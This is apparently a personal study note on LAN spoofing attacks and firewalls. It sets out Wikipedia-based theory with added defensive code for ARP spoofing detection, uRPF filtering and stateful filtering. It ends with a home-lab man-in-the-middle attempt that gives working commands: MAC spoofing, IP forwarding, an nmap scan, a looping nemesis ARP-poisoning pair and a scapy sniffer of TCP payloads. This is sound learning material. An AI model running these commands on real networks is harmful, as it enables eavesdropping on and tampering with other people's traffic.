First, the theory from Wikipedia; then an attempt at a man-in-the-middle attack.
Theoretical Basis
The following content is from Wikipedia.
ARP Spoofing
Attackers send forged ARP messages over the LAN, usually to associate the attacker's MAC address with the IP address of another host, so that traffic destined for that host is redirected to the attacker.
ARP spoofing lets an attacker intercept data frames on a LAN, modify traffic, or block it. It is usually a stepping stone for another attack, such as DoS, MITM, or session hijacking.
The attack is confined to LAN segments that use ARP.
LAN communication requires translating the network-layer IP address into the data-link-layer MAC address for transmission. A host that knows a peer's IP address but needs its MAC address broadcasts an ARP request; the peer's ARP reply carries the MAC address for that IP.
ARP is stateless, and hosts cache any ARP reply they receive, whether or not they requested it. Even a cache entry that has not yet expired is overwritten by a new reply. The host has no way to authenticate the source of the packet.
An ARP attack may come from a compromised machine or directly from the attacker's host. The usual goal is to associate the attacker's MAC address with the target's IP address, so that traffic meant for the target is delivered to the attacker. The attacker can then:
- Intercept the data and forward it to the target (eavesdropping).
- Modify the data before sending it on to the target (MITM).
- Drop all or some of the packets (DoS).
Defenses include:
- Static ARP tables.
- Software that authenticates or cross-checks ARP replies. DHCP servers, standalone hosts, Ethernet switches and other network devices can do this. For example, one MAC address associated with multiple IP addresses may indicate ARP spoofing.
- Operating-system behaviour. Linux ignores unsolicited replies but uses requests seen from other machines to update its cache. Solaris only updates a cache entry after it times out. On Windows the behaviour is configured under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters with the values ArpCacheLife, ArpCacheMinReferenceLife, ArpUseEtherSNAP, ArpTRSingleRoute, ArpAlwaysSourceRoute and ArpRetryCount.
- Host-based defence. A host can reject any reply whose MAC address differs from the one already cached, or accept it only after checking whether the previously cached MAC address is still reachable. Both rely on the cached MAC address being valid.
- Passive detection. Monitor ARP requests and replies on the network to build an IP-to-MAC database.
- A DHCP server that, after assigning an IP address, creates and maintains a list of bindings for the gateway.
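As an added example (not from the original post), here is a passive detector of the kind described in the list above: it parses raw Ethernet/ARP frames, keeps an IP-to-MAC database, and raises the three signals the list mentions: an unsolicited reply, a changed binding, and one MAC claiming several IP addresses. The frames are constructed inline and the MAC addresses are made up.

```python
import socket, struct

ETH_ARP, ARP_FMT = 0x0806, "!HHBBH6s4s6s4s"  # ARP fields: htype, ptype, hlen, plen, op, sha, spa, tha, tpa
def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):  # used only to construct sample frames
    smac, tmac = (bytes.fromhex(m.replace(":", "")) for m in (sender_mac, target_mac))
    return struct.pack("!6s6sH", tmac, smac, ETH_ARP) + struct.pack(
        ARP_FMT, 1, 0x0800, 6, 4, op, smac, socket.inet_aton(sender_ip), tmac, socket.inet_aton(target_ip))

def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_ip) for an IPv4-over-Ethernet ARP request/reply, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, _tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4) or op not in (1, 2):
        return None
    return op, sha.hex(":"), socket.inet_ntoa(spa), socket.inet_ntoa(tpa)

class ArpMonitor:  # passive IP-to-MAC tracker that flags the three patterns listed above
    def __init__(self):
        self.ip_to_mac = {}       # first binding seen per IP (the trusted baseline)
        self.mac_to_ips = {}      # every IP each MAC has claimed
        self.outstanding = set()  # IPs asked for in a request and not yet answered
    def feed(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return []
        op, smac, sip, tip = parsed
        if op == 1:                       # request: just remember what was asked for
            self.outstanding.add(tip)
            return []
        alerts = []
        if sip not in self.outstanding:   # reply nobody asked for (gratuitous or forged)
            alerts.append(f"unsolicited reply: {sip} is-at {smac}")
        self.outstanding.discard(sip)
        known = self.ip_to_mac.setdefault(sip, smac)
        if known != smac:                 # binding differs from the baseline
            alerts.append(f"binding change: {sip} was {known}, now claimed by {smac}")
        self.mac_to_ips.setdefault(smac, set()).add(sip)
        if len(self.mac_to_ips[smac]) > 1:  # one MAC answering for several IPs
            alerts.append(f"{smac} claims several IPs: {sorted(self.mac_to_ips[smac])}")
        return alerts
# Constructed sample: a genuine request/reply, then two forged replies rebinding gateway and host to BAD_MAC.
GW_MAC, HOST_MAC, BAD_MAC = "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02", "aa:bb:cc:00:00:99"
SAMPLE = [build_arp(1, HOST_MAC, "192.168.1.102", "00:00:00:00:00:00", "192.168.1.1"),
          build_arp(2, GW_MAC, "192.168.1.1", HOST_MAC, "192.168.1.102"),
          build_arp(2, BAD_MAC, "192.168.1.1", HOST_MAC, "192.168.1.102"),
          build_arp(2, BAD_MAC, "192.168.1.102", GW_MAC, "192.168.1.1")]
def run_sample():
    mon = ArpMonitor()
    return [mon.feed(f) for f in SAMPLE]
```

On a real host the same feed() would be driven by frames read from a raw socket on the LAN interface.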
MAC Spoofing
MAC spoofing is a technique for changing the MAC address of a network interface. The address burned into the network interface controller cannot itself be changed, but the operating system can be made to use a user-specified MAC address instead. This effectively changes the identity of a computer, and it is quite simple to do.
It is typically used to bypass access control lists on servers or routers, to hide a computer, or to impersonate another network device. It can be legitimate or illegitimate:
- Using new or multiple devices with an ISP that binds service to one MAC address. Attackers can abuse the same technique.
- Satisfying software that is bound to a MAC address.
- Hiding identity to protect privacy. The MAC address on a Wi-Fi link is not encrypted, so a NIC in monitor mode can easily collect MAC addresses; someone who does not want to be tracked can spoof theirs. The same technique, however, lets an attacker impersonate an authenticated user and carry out illegal activity that is hard to detect.
A MAC-spoofing host generally still receives traffic (some hardened switch configurations can block such frames). MAC spoofing is, however, limited to the local broadcast domain.
IP Spoofing
IP spoofing is forging the source address in an IP packet, either to hide the sender's identity or to impersonate another machine.
The attacker rewrites the source-address field of the IP header so the packet appears to come from another machine. The machine that receives the forged packet sends its reply to the wrong host. Usually the attacker does not care about the reply, or has a reliable way to observe it.
In some circumstances an attacker can see or redirect the reply packets to their own machine. This is most common on a local LAN or wireless LAN.
IP spoofing is often used in DoS attacks: because the packets come from many different addresses, filtering is difficult and IP-based defences stop working. Backscatter is a statistical technique based on packets from invalid addresses, but more sophisticated attacks avoid invalid addresses.
IP spoofing is also used to bypass IP-based authentication. Although it means forging thousands of packets at a time, and it is very difficult against a remote system, it is effective between trusted intranet machines.
IP spoofing is sometimes also used for website performance testing.
Services that are vulnerable to IP spoofing include:
- RPC
- Any IP-based authentication
- X Window System
- The r-series remote services such as rlogin and rsh
Defenses
- Packet filtering. The gateway filters ingress or egress packets by source IP address, for example with uRPF (unicast Reverse Path Forwarding).
- Designing network protocols and services that do not rely on IP addresses for authentication.
- Some upper-layer protocols offer some protection. For example, TCP uses sequence numbers negotiated with the remote machine to ensure that arriving packets belong to the established connection. Because the attacker usually cannot see the reply packets, they must guess the sequence number to hijack the connection. Some older systems and network devices have predictable TCP sequence numbers.
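An added illustration of the uRPF filtering in the first item, not part of the original text: a longest-prefix lookup over a constructed routing table, with strict mode (the reverse path to the source must be the ingress interface) and, going beyond the page, loose mode (any non-default route to the source suffices). The routing table, interface names and sample packets are all made up.

```python
import ipaddress

# Constructed routing table for a small gateway (prefix -> egress interface); not from any real router.
ROUTES = {"192.168.1.0/24": "lan0", "10.0.0.0/8": "lan1", "0.0.0.0/0": "wan0"}

def reverse_path(src_ip, routes=ROUTES):
    """Longest-prefix match: the interface the router would send a packet back to src_ip through, or None."""
    addr = ipaddress.ip_address(src_ip)
    matches = [(ipaddress.ip_network(p), ifname) for p, ifname in routes.items()
               if addr in ipaddress.ip_network(p)]
    if not matches:
        return None
    return max(matches, key=lambda m: m[0].prefixlen)[1]

def urpf_strict(src_ip, ingress, routes=ROUTES):
    """Strict uRPF: accept only if the reverse path to the source is the interface the packet arrived on."""
    return reverse_path(src_ip, routes) == ingress

def urpf_loose(src_ip, routes=ROUTES):
    """Loose uRPF: accept if any non-default route to the source exists; catches unrouted sources only.
    Ignoring the default route mirrors common router behaviour but is a simplifying assumption here."""
    specific = {p: i for p, i in routes.items() if ipaddress.ip_network(p).prefixlen > 0}
    return reverse_path(src_ip, specific) is not None

# Constructed ingress sample: (source IP of the packet, interface it arrived on).
SAMPLE = [("198.51.100.7", "wan0"),  # Internet host on the WAN side: legitimate
          ("192.168.1.50", "wan0"),  # LAN address arriving from the Internet: spoofed
          ("10.1.2.3", "lan1"),      # internal host on its own segment: legitimate
          ("8.8.8.8", "lan0"),       # external source leaving a LAN port: spoofed egress
          ("10.1.2.3", "lan0")]      # internal source on the wrong segment: spoofed or misrouted

def filter_sample():
    """Apply strict uRPF to the sample and return (src, ingress, verdict) per packet."""
    return [(src, ing, "accept" if urpf_strict(src, ing) else "drop") for src, ing in SAMPLE]
```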
Email Spoofing
I'll come back to this later. In fact, the git server we set up on the intranet sent an email to my mailbox, and I thought of this as soon as I received it.
URL Spoofing
Let's leave this for later. It reminds me of the "wretched stream" (sneaky-trick) URL hacks on wooyun.
Firewall
Historically, firewall development falls into three generations:
Packet filtering. First-generation firewalls filter each packet in isolation. If a rule matches, the packet is dropped (silently discarded) or rejected (an error is returned). The rules are generally based on source address, destination address, protocol, and TCP/UDP ports. The firewall has no information about connections; it is stateless.
This generation works at the lower layers, looking at source and destination addresses and the transport-layer ports.
Stateful filtering. Second-generation firewalls keep the first-generation functions but also work at OSI layer 4, the transport layer, using connection state as a criterion. Packets are retained until enough have been seen to determine the connection state. The firewall records all established connections and decides whether a packet starts a new connection, belongs to an existing one, or belongs to neither.
Application-layer firewalls work at the application layer. They understand the upper-layer protocol and can detect an illegitimate protocol trying to pass through a permitted port. The much-touted next-generation firewall (NGFW) extends and deepens this application-layer inspection.
Firewalls can also be classified by where they intercept communication and what state they track:
Network-layer or packet-filtering firewalls operate at the relatively low TCP/IP layers and filter by rules. There are two kinds:
Stateful: stores the source and destination addresses and ports for the current connection phase. A packet that does not belong to an existing connection is evaluated against the rules for new connections; a packet that belongs to a known connection is handled according to that connection's policy.
Stateless: needs less memory and is faster, and suits connectionless protocols, but cannot make complex decisions based on the state of a conversation. iptables is one example.
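An added example, not from the original post, contrasting the two kinds above: a stateless rule that approximates "established" by checking the ACK flag, beside a stateful tracker that admits inbound packets only when they belong to a connection a LAN host opened. The Packet class, the LAN prefix and the traffic are constructed for the demo.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Packet:  # only the header fields a packet filter looks at (constructed, not a real parser)
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False
    ack: bool = False

LAN = "192.168.1."  # constructed inside prefix

def stateless_allow(p):
    """First-generation rule set: judge each packet alone. Outbound from the LAN is allowed;
    inbound is allowed if ACK is set, the usual stateless stand-in for 'established'."""
    return p.src.startswith(LAN) or p.ack

class StatefulFilter:
    """Second-generation filter: remembers connections opened from the LAN and admits
    inbound packets only when they belong to one of them."""
    def __init__(self):
        self.conns = set()  # (lan_ip, lan_port, remote_ip, remote_port)

    def allow(self, p):
        if p.src.startswith(LAN):
            if p.syn and not p.ack:                        # new-connection rule: record it
                self.conns.add((p.src, p.sport, p.dst, p.dport))
                return True
            return (p.src, p.sport, p.dst, p.dport) in self.conns
        return (p.dst, p.dport, p.src, p.sport) in self.conns  # inbound must match a tracked connection

# Constructed traffic: a LAN host opens a connection, the server answers, then two inbound
# packets with ACK set arrive that no tracked connection explains (forged or scan packets).
SAMPLE = [Packet("192.168.1.102", 40000, "203.0.113.5", 443, syn=True),
          Packet("203.0.113.5", 443, "192.168.1.102", 40000, syn=True, ack=True),
          Packet("203.0.113.5", 443, "192.168.1.102", 40001, ack=True),
          Packet("198.51.100.9", 22, "192.168.1.102", 40000, ack=True)]

def compare():
    """Return (stateless verdict, stateful verdict) for each sample packet, in order."""
    sf = StatefulFilter()
    return [(stateless_allow(p), sf.allow(p)) for p in SAMPLE]
```

The last two packets pass the stateless rule because ACK alone looks "established", while the stateful filter drops them because no LAN host opened those connections.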
Application-layer firewalls intercept inter-process communication at the socket level and filter it with various rules. They cannot defend against exploitation of lower-layer vulnerabilities and are being superseded by mandatory-access-control (MAC) application firewalls, that is, sandboxes.
Proxies, whether dedicated hardware or software, work by answering incoming packets as an application would. A proxy server is the gateway from one network to another for a specific network application and acts on behalf of users on the network. Proxies allow a more thorough separation between intranet and Internet, but an attacker can also use a machine as a proxy to attack the internal network.
NAT (Network Address Translation): firewalls usually provide it, and machines behind the firewall usually have private IP addresses. NAT was originally meant to mitigate IPv4 address exhaustion, but incidentally became an important defence against network reconnaissance.
Rogue DHCP
Forging a DHCP server.
DNS Series
Left for the DNS write-up.
Next I tried a man-in-the-middle attack, with my mobile phone and laptop both on the WLAN.
0.0) MAC spoofing
sudo ip link set eth0 down
sudo ip link set dev eth0 address 38:AA:3C:E6:FE:69
sudo ip link set eth0 up
0.1) Preparation (run as root)
ifconfig wlan0 promisc
echo 1 > /proc/sys/net/ipv4/ip_forward
1) Scan for targets
sudo nmap -sS 192.168.1.0/24
2) ARP attack
while true
do
    sudo nemesis arp -v -r -d wlan0 -S 192.168.1.102 -D 192.168.1.1 -h E8:39:DF:08:F4:FB -m EC:88:8F:B4:D6:68 -H E8:39:DF:08:F4:FB -M EC:88:8F:B4:D6:68
    sudo nemesis arp -v -r -d wlan0 -S 192.168.1.1 -D 192.168.1.102 -h E8:39:DF:08:F4:FB -m 68:5D:43:2E:AA:59 -H E8:39:DF:08:F4:FB -M 68:5D:43:2E:AA:59
done
3) Listen
from scapy.all import sniff
# sprintf is a method of the captured packet; sniff prints whatever prn returns
pkts = sniff(filter="tcp and host 192.168.1.102", iface="wlan0",
             prn=lambda x: x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{Raw:%Raw.load%\n}"))